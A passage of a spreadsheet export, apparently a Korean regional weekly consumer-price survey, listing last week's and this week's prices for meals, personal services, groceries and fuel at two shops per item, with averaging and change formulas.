A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: =COUNTIF(J47,"<>0")+COUNTIF(N47,"<>0") -> 2 | E47: =COUNTIF(K47,"<>0")+COUNTIF(O47,"<>0") -> 2 | F47: =IF(D47=0,0,SUM(J47,N47)/D47) -> 7,000 | G47: =IF(E47=0,0,SUM(K47,O47)/E47) -> 7,000 | H47: =G47-F47 -> 0 | I47: 소담칼국수 | J47: 7,000 | K47: 7,000 | L47: =K47-J47 -> 0 | M47: 민속칼국수 | N47: 7,000 | O47: 7,000 | P47: =O47-N47 -> 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: =COUNTIF(J48,"<>0")+COUNTIF(N48,"<>0") -> 2 | E48: =COUNTIF(K48,"<>0")+COUNTIF(O48,"<>0") -> 2 | F48: =IF(D48=0,0,SUM(J48,N48)/D48) -> 3,650 | G48: =IF(E48=0,0,SUM(K48,O48)/E48) -> 3,650 | H48: =G48-F48 -> 0 | I48: 농협하나로분식 | J48: 3,500 | K48: 3,500 | L48: =K48-J48 -> 0 | M48: 고봉민김밥 | N48: 3,800 | O48: 3,800 | P48: =O48-N48 -> 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: =COUNTIF(J49,"<>0")+COUNTIF(N49,"<>0") -> 2 | E49: =COUNTIF(K49,"<>0")+COUNTIF(O49,"<>0") -> 2 | F49: =IF(D49=0,0,SUM(J49,N49)/D49) -> 3,750 | G49: =IF(E49=0,0,SUM(K49,O49)/E49) -> 3,750 | H49: =G49-F49 -> 0 | I49: 농협하나로분식 | J49: 3,000 | K49: 3,000 | L49: =K49-J49 -> 0 | M49: 김가네 | N49: 4,500 | O49: 4,500 | P49: =O49-N49 -> 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: =COUNTIF(J50,"<>0")+COUNTIF(N50,"<>0") -> 2 | E50: =COUNTIF(K50,"<>0")+COUNTIF(O50,"<>0") -> 2 | F50: =IF(D50=0,0,SUM(J50,N50)/D50) -> 7,000 | G50: =IF(E50=0,0,SUM(K50,O50)/E50) -> 7,000 | H50: =G50-F50 -> 0 | I50: 마동짬뽕 | J50: 7,000 | K50: 7,000 | L50: =K50-J50 -> 0 | M50: 연경 | N50: 7,000 | O50: 7,000 | P50: =O50-N50 -> 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: =COUNTIF(J51,"<>0")+COUNTIF(N51,"<>0") -> 2 | E51: =COUNTIF(K51,"<>0")+COUNTIF(O51,"<>0") -> 2 | F51: =IF(D51=0,0,SUM(J51,N51)/D51) -> 9,000 | G51: =IF(E51=0,0,SUM(K51,O51)/E51) -> 9,000 | H51: =G51-F51 -> 0 | I51: 마동짬뽕 | J51: 10,000 | K51: 10,000 | L51: =K51-J51 -> 0 | M51: 연경 | N51: 8,000 | O51: 8,000 | P51: =O51-N51 -> 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: =COUNTIF(J52,"<>0")+COUNTIF(N52,"<>0") -> 2 | E52: =COUNTIF(K52,"<>0")+COUNTIF(O52,"<>0") -> 2 | F52: =IF(D52=0,0,SUM(J52,N52)/D52) -> 21,500 | G52: =IF(E52=0,0,SUM(K52,O52)/E52) -> 21,500 | H52: =G52-F52 -> 0 | I52: 마동짬봉 | J52: 22,000 | K52: 22,000 | L52: =K52-J52 -> 0 | M52: 연경 | N52: 21000 | O52: 21000 | P52: =O52-N52 -> 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: =COUNTIF(J53,"<>0")+COUNTIF(N53,"<>0") -> 2 | E53: =COUNTIF(K53,"<>0")+COUNTIF(O53,"<>0") -> 2 | F53: =IF(D53=0,0,SUM(J53,N53)/D53) -> 9,750 | G53: =IF(E53=0,0,SUM(K53,O53)/E53) -> 9,750 | H53: =G53-F53 -> 0 | I53: 거인초밥 | J53: 9,000 | K53: 9,000 | L53: =K53-J53 -> 0 | M53: 스타카츠 | N53: 10,500 | O53: 10,500 | P53: =O53-N53 -> 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: =COUNTIF(J54,"<>0")+COUNTIF(N54,"<>0") -> 2 | E54: =COUNTIF(K54,"<>0")+COUNTIF(O54,"<>0") -> 2 | F54: =IF(D54=0,0,SUM(J54,N54)/D54) -> 3,150 | G54: =IF(E54=0,0,SUM(K54,O54)/E54) -> 3,150 | H54: =G54-F54 -> 0 | I54: 롯데리아중동점 | J54: 3300 | K54: 3300 | L54: =K54-J54 -> 0 | M54: 맥도날드 광양DT점 | N54: 3,000 | O54: 3,000 | P54: =O54-N54 -> 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: =COUNTIF(J55,"<>0")+COUNTIF(N55,"<>0") -> 2 | E55: =COUNTIF(K55,"<>0")+COUNTIF(O55,"<>0") -> 2 | F55: =IF(D55=0,0,SUM(J55,N55)/D55) -> 18,950 | G55: =IF(E55=0,0,SUM(K55,O55)/E55) -> 18,950 | H55: =G55-F55 -> 0 | I55: 임실치즈피자 | J55: 22900 | K55: 22900 | L55: =K55-J55 -> 0 | M55: 피자맨 | N55: 15,000 | O55: 15,000 | P55: =O55-N55 -> 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: =COUNTIF(J56,"<>0")+COUNTIF(N56,"<>0") -> 2 | E56: =COUNTIF(K56,"<>0")+COUNTIF(O56,"<>0") -> 2 | F56: =IF(D56=0,0,SUM(J56,N56)/D56) -> 3,250 | G56: =IF(E56=0,0,SUM(K56,O56)/E56) -> 3,250 | H56: =G56-F56 -> 0 | I56: 루앤비 마동점 | J56: 3,500 | K56: 3,500 | L56: =K56-J56 -> 0 | M56: 모닝 | N56: 3,000 | O56: 3,000 | P56: =O56-N56 -> 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: =COUNTIF(J57,"<>0")+COUNTIF(N57,"<>0") -> 2 | E57: =COUNTIF(K57,"<>0")+COUNTIF(O57,"<>0") -> 2 | F57: =IF(D57=0,0,SUM(J57,N57)/D57) -> 3,400 | G57: =IF(E57=0,0,SUM(K57,O57)/E57) -> 3,400 | H57: =G57-F57 -> 0 | I57: 루앤비 마동점 | J57: 2,800 | K57: 2,800 | L57: =K57-J57 -> 0 | M57: 모닝 | N57: 4,000 | O57: 4,000 | P57: =O57-N57 -> 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: =COUNTIF(J58,"<>0")+COUNTIF(N58,"<>0") -> 2 | E58: =COUNTIF(K58,"<>0")+COUNTIF(O58,"<>0") -> 2 | F58: =IF(D58=0,0,SUM(J58,N58)/D58) -> 15,500 | G58: =IF(E58=0,0,SUM(K58,O58)/E58) -> 15,500 | H58: =G58-F58 -> 0 | I58: 남부촌 | J58: 15,000 | K58: 15,000 | L58: =K58-J58 -> 0 | M58: 대한숯불고기 | N58: 16,000 | O58: 16,000 | P58: =O58-N58 -> 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: =COUNTIF(J59,"<>0")+COUNTIF(N59,"<>0") -> 2 | E59: =COUNTIF(K59,"<>0")+COUNTIF(O59,"<>0") -> 2 | F59: =IF(D59=0,0,SUM(J59,N59)/D59) -> 11,500 | G59: =IF(E59=0,0,SUM(K59,O59)/E59) -> 11,500 | H59: =G59-F59 -> 0 | I59: 남부촌 | J59: 11,000 | K59: 11,000 | L59: =K59-J59 -> 0 | M59: 대한숯불고기 | N59: 12,000 | O59: 12,000 | P59: =O59-N59 -> 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: =COUNTIF(J60,"<>0")+COUNTIF(N60,"<>0") -> 2 | E60: =COUNTIF(K60,"<>0")+COUNTIF(O60,"<>0") -> 2 | F60: =IF(D60=0,0,SUM(J60,N60)/D60) -> 41,000 | G60: =IF(E60=0,0,SUM(K60,O60)/E60) -> 41,000 | H60: =G60-F60 -> 0 | I60: 하면옥 | J60: 35,000 | K60: 35,000 | L60: =K60-J60 -> 0 | M60: 은성면옥 | N60: 47,000 | O60: 47,000 | P60: =O60-N60 -> 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: =COUNTIF(J61,"<>0")+COUNTIF(N61,"<>0") -> 2 | E61: =COUNTIF(K61,"<>0")+COUNTIF(O61,"<>0") -> 2 | F61: =IF(D61=0,0,SUM(J61,N61)/D61) -> 3,750 | G61: =IF(E61=0,0,SUM(K61,O61)/E61) -> 3,750 | H61: =G61-F61 -> 0 | I61: 꼬치니 | J61: 3,500 | K61: 3,500 | L61: =K61-J61 -> 0 | M61: 투모아 | N61: 4,000 | O61: 4,000 | P61: =O61-N61 -> 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 18평1개월 (공과금 제외) | D62: =COUNTIF(J62,"<>0")+COUNTIF(N62,"<>0") -> 2 | E62: =COUNTIF(K62,"<>0")+COUNTIF(O62,"<>0") -> 2 | F62: =IF(D62=0,0,SUM(J62,N62)/D62) -> 60,000 | G62: =IF(E62=0,0,SUM(K62,O62)/E62) -> 60,000 | H62: =G62-F62 -> 0 | I62: 부영동광2차20평형 | J62: 65000 | K62: 65000 | L62: =K62-J62 -> 0 | M62: 금광아파트16평형 | N62: 55,000 | O62: 55,000 | P62: =O62-N62 -> 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: =COUNTIF(J63,"<>0")+COUNTIF(N63,"<>0") -> 2 | E63: =COUNTIF(K63,"<>0")+COUNTIF(O63,"<>0") -> 2 | F63: =IF(D63=0,0,SUM(J63,N63)/D63) -> 10,000 | G63: =IF(E63=0,0,SUM(K63,O63)/E63) -> 10,000 | H63: =G63-F63 -> 0 | I63: 소망세탁소 | J63: 10000 | K63: 10000 | L63: =K63-J63 -> 0 | M63: 무등세탁소 | N63: 10,000 | O63: 10,000 | P63: =O63-N63 -> 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: =COUNTIF(J64,"<>0")+COUNTIF(N64,"<>0") -> 2 | E64: =COUNTIF(K64,"<>0")+COUNTIF(O64,"<>0") -> 2 | F64: =IF(D64=0,0,SUM(J64,N64)/D64) -> 6,000 | G64: =IF(E64=0,0,SUM(K64,O64)/E64) -> 6,000 | H64: =G64-F64 -> 0 | I64: 소망세탁소 | J64: 6000 | K64: 6000 | L64: =K64-J64 -> 0 | M64: 무등세탁소 | N64: 6,000 | O64: 6,000 | P64: =O64-N64 -> 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: =COUNTIF(J65,"<>0")+COUNTIF(N65,"<>0") -> 0 | E65: =COUNTIF(K65,"<>0")+COUNTIF(O65,"<>0") -> 0 | F65: =IF(D65=0,0,SUM(J65,N65)/D65) -> 0 | G65: =IF(E65=0,0,SUM(K65,O65)/E65) -> 0 | H65: =G65-F65 -> 0 | J65: 0 | K65: 0 | L65: =K65-J65 -> 0 | N65: 0 | O65: 0 | P65: 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: =COUNTIF(J66,"<>0")+COUNTIF(N66,"<>0") -> 0 | E66: =COUNTIF(K66,"<>0")+COUNTIF(O66,"<>0") -> 0 | F66: =IF(D66=0,0,SUM(J66,N66)/D66) -> 0 | G66: =IF(E66=0,0,SUM(K66,O66)/E66) -> 0 | H66: =G66-F66 -> 0 | J66: 0 | K66: 0 | L66: =K66-J66 -> 0 | N66: 0 | O66: 0 | P66: =O66-N66 -> 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: 0 | E67: 0 | F67: =IF(D67=0,0,SUM(J67,N67)/D67) -> 0 | G67: =IF(E67=0,0,SUM(K67,O67)/E67) -> 0 | H67: =G67-F67 -> 0 | J67: 0 | K67: 0 | L67: =K67-J67 -> 0 | N67: 0 | O67: 0 | P67: =O67-N67 -> 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: =COUNTIF(J68,"<>0")+COUNTIF(N68,"<>0") -> 1 | E68: =COUNTIF(K68,"<>0")+COUNTIF(O68,"<>0") -> 1 | F68: =IF(D68=0,0,SUM(J68,N68)/D68) -> 0 | G68: =IF(E68=0,0,SUM(K68,O68)/E68) -> 0 | H68: =G68-F68 -> 0 | L68: =K68-J68 -> 0 | N68: 0 | O68: 0 | P68: =O68-N68 -> 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: =COUNTIF(J69,"<>0")+COUNTIF(N69,"<>0") -> 2 | E69: =COUNTIF(K69,"<>0")+COUNTIF(O69,"<>0") -> 2 | F69: =IF(D69=0,0,SUM(J69,N69)/D69) -> 150,000 | G69: =IF(E69=0,0,SUM(K69,O69)/E69) -> 150,000 | H69: =G69-F69 -> 0 | I69: 최은규골프클리닉 | J69: 150000 | K69: 150000 | L69: =K69-J69 -> 0 | M69: 미가로골프연습장 | N69: 150,000 | O69: 150,000 | P69: =O69-N69 -> 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: =COUNTIF(J70,"<>0")+COUNTIF(N70,"<>0") -> 2 | E70: =COUNTIF(K70,"<>0")+COUNTIF(O70,"<>0") -> 2 | F70: =IF(D70=0,0,SUM(J70,N70)/D70) -> 25,000 | G70: =IF(E70=0,0,SUM(K70,O70)/E70) -> 25,000 | H70: =G70-F70 -> 0 | I70: 세븐노래방 | J70: 25000 | K70: 25000 | L70: =K70-J70 -> 0 | M70: 압구정노래연습장 | N70: 25,000 | O70: 25,000 | P70: =O70-N70 -> 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: =COUNTIF(J71,"<>0")+COUNTIF(N71,"<>0") -> 2 | E71: =COUNTIF(K71,"<>0")+COUNTIF(O71,"<>0") -> 2 | F71: =IF(D71=0,0,SUM(J71,N71)/D71) -> 10,400 | G71: =IF(E71=0,0,SUM(K71,O71)/E71) -> 10,400 | H71: =G71-F71 -> 0 | I71: 세리당구장 | J71: 10800 | K71: 10800 | L71: =K71-J71 -> 0 | M71: 청솔당구장 | N71: 10,000 | O71: 10,000 | P71: =O71-N71 -> 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: =COUNTIF(J72,"<>0")+COUNTIF(N72,"<>0") -> 2 | E72: =COUNTIF(K72,"<>0")+COUNTIF(O72,"<>0") -> 2 | F72: =IF(D72=0,0,SUM(J72,N72)/D72) -> 15,000 | G72: =IF(E72=0,0,SUM(K72,O72)/E72) -> 15,000 | H72: =G72-F72 -> 0 | I72: 세원스튜디오 | J72: 15000 | K72: 15000 | L72: =K72-J72 -> 0 | M72: 조민철사진이야기 | N72: 15,000 | O72: 15,000 | P72: =O72-N72 -> 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: =COUNTIF(J73,"<>0")+COUNTIF(N73,"<>0") -> 2 | E73: =COUNTIF(K73,"<>0")+COUNTIF(O73,"<>0") -> 2 | F73: =IF(D73=0,0,SUM(J73,N73)/D73) -> 300 | G73: =IF(E73=0,0,SUM(K73,O73)/E73) -> 300 | H73: =G73-F73 -> 0 | I73: 세원스튜디오 | J73: 300 | K73: 300 | L73: =K73-J73 -> 0 | M73: 조민철사진이야기 | N73: 300 | O73: 300 | P73: =O73-N73 -> 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: 0 | E74: 0 | F74: =IF(D74=0,0,SUM(J74,N74)/D74) -> 0 | G74: =IF(E74=0,0,SUM(K74,O74)/E74) -> 0 | H74: =G74-F74 -> 0 | J74: 0 | K74: 0 | L74: =K74-J74 -> 0 | N74: 0 | O74: 0 | P74: =O74-N74 -> 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: =COUNTIF(J75,"<>0")+COUNTIF(N75,"<>0") -> 2 | E75: =COUNTIF(K75,"<>0")+COUNTIF(O75,"<>0") -> 2 | F75: =IF(D75=0,0,SUM(J75,N75)/D75) -> 18,000 | G75: =IF(E75=0,0,SUM(K75,O75)/E75) -> 18,000 | H75: =G75-F75 -> 0 | I75: 광명이용원 | J75: 18000 | K75: 18000 | L75: =K75-J75 -> 0 | M75: 농협이발소 | N75: 18000 | O75: 18000 | P75: =O75-N75 -> 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: =COUNTIF(J76,"<>0")+COUNTIF(N76,"<>0") -> 2 | E76: =COUNTIF(K76,"<>0")+COUNTIF(O76,"<>0") -> 2 | F76: =IF(D76=0,0,SUM(J76,N76)/D76) -> 42,500 | G76: =IF(E76=0,0,SUM(K76,O76)/E76) -> 42,500 | H76: =G76-F76 -> 0 | I76: 가위연가 | J76: 40000 | K76: 40000 | L76: =K76-J76 -> 0 | M76: 자르지오 | N76: 45,000 | O76: 45,000 | P76: =O76-N76 -> 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: =COUNTIF(J77,"<>0")+COUNTIF(N77,"<>0") -> 1 | E77: =COUNTIF(K77,"<>0")+COUNTIF(O77,"<>0") -> 1 | F77: =IF(D77=0,0,SUM(J77,N77)/D77) -> 8,000 | G77: =IF(E77=0,0,SUM(K77,O77)/E77) -> 8,000 | H77: =G77-F77 -> 0 | J77: 0 | K77: 0 | L77: =K77-J77 -> 0 | M77: 가야천사우나 | N77: 8,000 | O77: 8,000 | P77: =O77-N77 -> 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: =COUNTIF(J78,"<>0")+COUNTIF(N78,"<>0") -> 1 | E78: =COUNTIF(K78,"<>0")+COUNTIF(O78,"<>0") -> 1 | F78: =IF(D78=0,0,SUM(J78,N78)/D78) -> 90,000 | G78: =IF(E78=0,0,SUM(K78,O78)/E78) -> 90,000 | H78: =G78-F78 -> 0 | I78: 호텔락희 광양점 | J78: 90000 | K78: 90000 | L78: =K78-J78 -> 0 | N78: 0 | O78: 0 | P78: =O78-N78 -> 0
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: =COUNTIF(J79,"<>0")+COUNTIF(N79,"<>0") -> 2 | E79: =COUNTIF(K79,"<>0")+COUNTIF(O79,"<>0") -> 2 | F79: =IF(D79=0,0,SUM(J79,N79)/D79) -> 52,500 | G79: =IF(E79=0,0,SUM(K79,O79)/E79) -> 52,500 | H79: =G79-F79 -> 0 | I79: 보스톤 | J79: 55000 | K79: 55000 | L79: =K79-J79 -> 0 | M79: 블루밍모텔 | N79: 50,000 | O79: 50,000 | P79: =O79-N79 -> 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: =COUNTIF(J80,"<>0")+COUNTIF(N80,"<>0") -> 0 | E80: =COUNTIF(K80,"<>0")+COUNTIF(O80,"<>0") -> 0 | F80: =IF(D80=0,0,SUM(J80,N80)/D80) -> 0 | G80: =IF(E80=0,0,SUM(K80,O80)/E80) -> 0 | H80: =G80-F80 -> 0 | J80: 0 | K80: 0 | L80: =K80-J80 -> 0 | N80: 0 | O80: 0 | P80: =O80-N80 -> 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: =COUNTIF(J81,"<>0")+COUNTIF(N81,"<>0") -> 2 | E81: =COUNTIF(K81,"<>0")+COUNTIF(O81,"<>0") -> 2 | F81: =IF(D81=0,0,SUM(J81,N81)/D81) -> 1,200 | G81: =IF(E81=0,0,SUM(K81,O81)/E81) -> 1,200 | H81: =G81-F81 -> 0 | I81: 딜라이트pc방 | J81: 1200 | K81: 1200 | L81: =K81-J81 -> 0 | M81: 크라우드pc방 | N81: 1,200 | O81: 1,200 | P81: =O81-N81 -> 0
A82: 47 | B82: 택배이용료 | C82: 20kg이하, 타지역 | D82: =COUNTIF(J82,"<>0")+COUNTIF(N82,"<>0") -> 2 | E82: =COUNTIF(K82,"<>0")+COUNTIF(O82,"<>0") -> 2 | F82: =IF(D82=0,0,SUM(J82,N82)/D82) -> 6,250 | G82: =IF(E82=0,0,SUM(K82,O82)/E82) -> 6,250 | H82: =G82-F82 -> 0 | I82: 우체국 | J82: 6500 | K82: 6500 | L82: =K82-J82 -> 0 | M82: 현대택배 | N82: 6,000 | O82: 6,000 | P82: =O82-N82 -> 0
A83: 48 | B83: 찜질방 이용료 | C83: 찜질방(성인 1회) (1회용품 제외) | D83: =COUNTIF(J83,"<>0")+COUNTIF(N83,"<>0") -> 0 | E83: =COUNTIF(K83,"<>0")+COUNTIF(O83,"<>0") -> 0 | F83: =IF(D83=0,0,SUM(J83,N83)/D83) -> 0 | G83: =IF(E83=0,0,SUM(K83,O83)/E83) -> 0 | H83: =G83-F83 -> 0 | J83: 0 | K83: 0 | L83: =K83-J83 -> 0 | N83: 0 | O83: 0 | P83: =O83-N83 -> 0
A84: 49 | B84: 대입학원비(종합) | C84: 대입(4년제)재수생 종합반 수강료 | D84: =COUNTIF(J84,"<>0")+COUNTIF(N84,"<>0") -> 0 | E84: =COUNTIF(K84,"<>0")+COUNTIF(O84,"<>0") -> 0 | F84: =IF(D84=0,0,SUM(J84,N84)/D84) -> 0 | G84: =IF(E84=0,0,SUM(K84,O84)/E84) -> 0 | H84: =G84-F84 -> 0 | J84: 0 | K84: 0 | L84: =K84-J84 -> 0 | N84: 0 | O84: 0
A85: 공산품 등 기타(13개품목)
A86: 1 | B86: 밀가루 | C86: 중력분 1등품 (1봉지 3kg) | D86: =COUNTIF(J86,"<>0")+COUNTIF(N86,"<>0") -> 2 | E86: =COUNTIF(K86,"<>0")+COUNTIF(O86,"<>0") -> 2 | F86: =IF(D86=0,0,SUM(J86,N86)/D86) -> 5,525 | G86: =IF(E86=0,0,SUM(K86,O86)/E86) -> 5,525 | H86: =G86-F86 -> 0 | I86: 농협하나로마트 | J86: 5350 | K86: 5350 | L86: =K86-J86 -> 0 | M86: 홈플러스 | N86: 5,700 | O86: 5,700 | P86: =O86-N86 -> 0
A87: 2 | B87: 두부 | C87: 공장제품 1모 | D87: =COUNTIF(J87,"<>0")+COUNTIF(N87,"<>0") -> 2 | E87: =COUNTIF(K87,"<>0")+COUNTIF(O87,"<>0") -> 2 | F87: =IF(D87=0,0,SUM(J87,N87)/D87) -> 1,485 | G87: =IF(E87=0,0,SUM(K87,O87)/E87) -> 1,485 | H87: =G87-F87 -> 0 | I87: 농협하나로마트 | J87: 1480 | K87: 1480 | L87: =K87-J87 -> 0 | M87: 홈플러스 | N87: 1,490 | O87: 1,490 | P87: =O87-N87 -> 0
A88: 3 | B88: 우유 | C88: 흰 우유(종이팩) 1개 200㎖ | D88: =COUNTIF(J88,"<>0")+COUNTIF(N88,"<>0") -> 2 | E88: =COUNTIF(K88,"<>0")+COUNTIF(O88,"<>0") -> 2 | F88: =IF(D88=0,0,SUM(J88,N88)/D88) -> 1,070 | G88: 1,070 | H88: =G88-F88 -> 0 | I88: 농협하나로마트 | J88: 1080 | K88: 1080 | L88: =K88-J88 -> 0 | M88: 홈플러스 | N88: 1,060 | O88: 1,060 | P88: =O88-N88 -> 0
A89: 4 | B89: 식용유 | C89: 콩기름 1.8ml | D89: =COUNTIF(J89,"<>0")+COUNTIF(N89,"<>0") -> 2 | E89: =COUNTIF(K89,"<>0")+COUNTIF(O89,"<>0") -> 2 | F89: 7,730 | G89: 7,730 | H89: =G89-F89 -> 0 | I89: 농협하나로마트 | J89: 6980 | K89: 6980 | L89: =K89-J89 -> 0 | M89: 홈플러스 | N89: 8480 | O89: 8480 | P89: =O89-N89 -> 0
A90: 5 | B90: 설탕 | C90: 정백당 1kg | D90: =COUNTIF(J90,"<>0")+COUNTIF(N90,"<>0") -> 2 | E90: =COUNTIF(K90,"<>0")+COUNTIF(O90,"<>0") -> 2 | F90: 2,380 | G90: 2,380 | H90: =G90-F90 -> 0 | I90: 농협하나로마트 | J90: 2380 | K90: 2380 | L90: =K90-J90 -> 0 | M90: 홈플러스 | N90: 2,380 | O90: 2,380 | P90: =O90-N90 -> 0
A91: 6 | B91: 생수 | C91: 플라스틱 1병(500㎖) | D91: =COUNTIF(J91,"<>0")+COUNTIF(N91,"<>0") -> 2 | E91: =COUNTIF(K91,"<>0")+COUNTIF(O91,"<>0") -> 2 | F91: 430 | G91: 430 | H91: =G91-F91 -> 0 | I91: 농협하나로마트 | J91: 430 | K91: 430 | L91: =K91-J91 -> 0 | M91: 홈플러스 | N91: 430 | O91: 430 | P91: =O91-N91 -> 0
A92: 7 | B92: 맥주 | C92: 1병 500㎖ (병 보증금 포함) | D92: =COUNTIF(J92,"<>0")+COUNTIF(N92,"<>0") -> 2 | E92: =COUNTIF(K92,"<>0")+COUNTIF(O92,"<>0") -> 2 | F92: 1,695 | G92: 1,695 | H92: =G92-F92 -> 0 | I92: 농협하나로마트 | J92: 1580 | K92: 1580 | L92: =K92-J92 -> 0 | M92: 홈플러스 | N92: 1,810 | O92: 1,810 | P92: =O92-N92 -> 0
A93: 8 | B93: 소주 | C93: 1병 360㎖ (병 보증금 포함) | D93: =COUNTIF(J93,"<>0")+COUNTIF(N93,"<>0") -> 2 | E93: =COUNTIF(K93,"<>0")+COUNTIF(O93,"<>0") -> 2 | F93: 1,385 | G93: 1,385 | H93: =G93-F93 -> 0 | I93: 농협하나로마트 | J93: 1390 | K93: 1390 | L93: =K93-J93 -> 0 | M93: 홈플러스 | N93: 1,380 | O93: 1,380 | P93: =O93-N93 -> 0
A94: 9 | B94: 등유 | C94: 주유소 판매 1ℓ | D94: =COUNTIF(J94,"<>0")+COUNTIF(N94,"<>0") -> 0 | E94: =COUNTIF(K94,"<>0")+COUNTIF(O94,"<>0") -> 0 | F94: 0 | G94: 0 | H94: =G94-F94 -> 0 | I94: S-oil 매일주유소 | J94: 0 | K94: 0 | L94: 0 | M94: GS희망찬주유소 | N94: 0 | O94: 0 | P94: =O94-N94 -> 0
A95: 10 | B95: 경유 | C95: 주유소 판매 1ℓ | D95: =COUNTIF(J95,"<>0")+COUNTIF(N95,"<>0") -> 2 | E95: =COUNTIF(K95,"<>0")+COUNTIF(O95,"<>0") -> 2 | F95: 1,604 | G95: 1,572 | H95: =G95-F95 -> -32 | I95: S-oil 매일주유소 | J95: 1,629 | K95: 1,599 | L95: =K95-J95 -> -30 | M95: GS희망찬주유소 | N95: 1,578 | O95: 1,545 | P95: =O95-N95 -> -33
A96: 11 | B96: 휘발유 | C96: 주유소 판매 1ℓ (무연) | D96: =COUNTIF(J96,"<>0")+COUNTIF(N96,"<>0") -> 2 | E96: =COUNTIF(K96,"<>0")+COUNTIF(O96,"<>0") -> 2 | F96: 1,644 | G96: 1,627 | H96: =G96-F96 -> -17 | I96: S-oil 매일주유소 | J96: 1,679 | K96: 1,659 | L96: =K96-J96 -> -20 | M96: GS희망찬주유소 | N96: 1,609 | O96: 1,595 | P96: =O96-N96 -> -14
A97: 12 | B97: 피아노 학원비 | C97: 관인학원 (초급반 1개월) | D97: =COUNTIF(J97,"<>0")+COUNTIF(N97,"<>0") -> 2 | E97: =COUNTIF(K97,"<>0")+COUNTIF(O97,"<>0") -> 2 | F97: 150,000 | G97: 150,000 | H97: 0 | I97: 클라라피아노 | J97: 150000 | K97: 150000 | L97: =K97-J97 -> 0 | M97: 바하의 아이들 | N97: 150,000 | O97: 150,000 | P97: =O97-N97 -> 0
A98: 13 | B98: 미술학원비 | C98: 초등 저학년 1개월 (재료비 포함) | D98: =COUNTIF(J98,"<>0")+COUNTIF(N98,"<>0") -> 2 | E98: =COUNTIF(K98,"<>0")+COUNTIF(O98,"<>0") -> 2 | F98: =IF(D98=0,0,SUM(J98,N98)/D98) -> 155,000 | G98: =IF(E98=0,0,SUM(K98,O98)/E98) -> 155,000 | H98: =G98-F98 -> 0 | I98: 파란미술학원 | J98: 150000 | K98: 150000 | L98: =K98-J98 -> 0 | M98: 꿈나무미술학원 | N98: 160,000 | O98: 160,000 | P98: =O98-N98 -> 0

Sheet 중마동2
A2: 주 간 물 가 동 향(중마동2)
M3: 조사자 : 조영희
A4: 연번 | B4: 품목 | C4: 규격·단위 | F4: 평 균 | I4: 조 사 1 지 역(와이마트) | M4: 조 사 2 지 역(중마시장)
F5: 전주 | G5: 금주 | H5: 증감액 | I5: 조 사 처 | J5: 전주 | K5: 금주 | L5: 증감액 | M5: 조 사 처 | N5: 전주 | O5: 금주 | P5: 증감액
A6: 농·축·수산물(28개 품목)
A7: 1 | B7: 쌀 | C7: 일반미20 (kg) | D7: =COUNTIF(J7,"<>0")+COUNTIF(N7,"<>0") -> 2 | E7: 2 | F7: =IF(D7=0,0,SUM(J7,N7)/D7) -> 61450 | G7: 59900 | H7: =G7-F7 -> -1550 | I7: 와이마트 | J7: 62900 | K7: 59800 | L7: =K7-J7 -> -3100 | M7: 중마시장 | N7: 60000 | O7: 60000 | P7: =O7-N7 -> 0
A8: 2 | B8: 무 | C8: 상품 1개(1㎏) | D8: 2 | E8: 2 | F8: 1800 | G8: 1850 | H8: 50 | I8: 와이마트 | J8: 1600 | K8: 1700 | L8: 100 | M8: 중마시장 | N8: 2000 | O8: 2000 | P8: 0
A9: 3 | B9: 상추 | C9: 잎상추 500g | D9: 2 | E9: 2 | F9: 6950 | G9: 9950 | H9: 3000 | I9: 와이마트 | J9: 9900 | K9: 9900 | L9: 0 | M9: 중마시장 | N9: 4000 | O9: 10000 | P9: 6000
A10: 4 | B10: 양상추 | C10: 상품1개(500g) | D10: 1 | E10: 1 | F10: 2000 | G10: 1800 | H10: -200 | I10: 와이마트 | J10: 2000 | K10: 1800 | L10: -200 | M10: 중마시장 | N10: 0 | O10: 0 | P10: 0
